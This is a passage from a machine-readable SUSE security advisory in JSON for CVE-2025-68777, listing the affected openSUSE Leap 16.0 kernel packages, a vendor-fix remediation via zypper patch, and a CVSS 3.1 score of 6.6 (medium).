"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68777",
"url": "https://www.suse.com/security/cve/CVE-2025-68777"
},
{
"category": "external",
"summary": "SUSE Bug 1256655 for CVE-2025-68777",
"url": "https://bugzilla.suse.com/1256655"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
